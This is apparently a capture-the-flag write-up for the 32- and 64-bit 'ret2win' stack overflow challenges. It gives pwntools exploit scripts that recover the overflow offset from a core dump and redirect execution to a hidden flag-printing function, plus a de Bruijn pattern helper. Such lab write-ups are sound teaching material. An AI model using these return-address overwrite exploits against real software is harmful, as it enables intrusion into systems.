ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge: an unused function, ret2win, sits in the .text segment and calls system("/bin/cat flag.txt") for us. Code like this is sometimes called "dead code".

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)

#--------Offset--------#

# Crash the binary with a cyclic pattern and recover the offset from the core file.
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter(b"> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter(b"> ", payload)

p.interactive()

ret2win 64bit

Solution

The idea is essentially the same as the 32-bit case. The one difference is how the offset is read from the core file: the pattern overwrites the saved return address with a non-canonical 64-bit value, so the ret faults before rip is updated, and the pattern bytes are read from where rsp points rather than from rip.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)

#--------Offset--------#

# Crash the binary with a cyclic pattern and recover the offset from the core file.
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter(b"> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
# rip is not updated on a non-canonical return, so read the pattern bytes at rsp.
offset = cyclic_find(core.read(core.rsp, 4))

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter(b"> ", payload)

p.interactive()
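Both Offset sections above lean on pwntools' cyclic()/cyclic_find(); the following pure-Python stand-in is an added example (not code from this writeup or from pwntools) showing how a de Bruijn pattern makes every 4-byte window unique, and how the 32-bit crash value (an integer eip) and the 64-bit one (bytes at rsp) both map back to an offset. The offsets 52 and 40 in the demo are arbitrary constructed values, not the challenge's.

```python
#!/usr/bin/env python3
"""Stand-in for pwntools' cyclic()/cyclic_find() (added example, not pwntools code)."""
import string

ALPHABET = string.ascii_lowercase  # same default alphabet pwntools uses
N = 4                              # every N-byte window of the pattern is unique


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) one byte at a time (FKM algorithm)."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]].encode()
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern, e.g. cyclic(8) == b"aaaabaaa"."""
    out = bytearray()
    for ch in de_bruijn():
        if len(out) == length:
            break
        out += ch
    return bytes(out)


def cyclic_find(subseq):
    """Offset of a 4-byte window in the pattern; accepts bytes or a register value."""
    if isinstance(subseq, int):
        subseq = subseq.to_bytes(N, "little")  # 32-bit: core.eip is a little-endian int
    subseq = bytes(subseq[:N])                 # 64-bit: core.read(core.rsp, 4) is bytes
    buf = bytearray()
    for ch in de_bruijn():
        buf += ch
        idx = buf.find(subseq, max(0, len(buf) - N))  # only the newest window
        if idx != -1:
            return idx
    return -1


if __name__ == "__main__":
    pattern = cyclic(1024)
    # Constructed crash values (arbitrary offsets 52 and 40, not the challenge's):
    fake_eip = int.from_bytes(pattern[52:56], "little")  # 32-bit: overwritten saved eip
    fake_rsp_bytes = pattern[40:44]                       # 64-bit: bytes rsp points at
    print(cyclic_find(fake_eip), cyclic_find(fake_rsp_bytes))  # 52 40
```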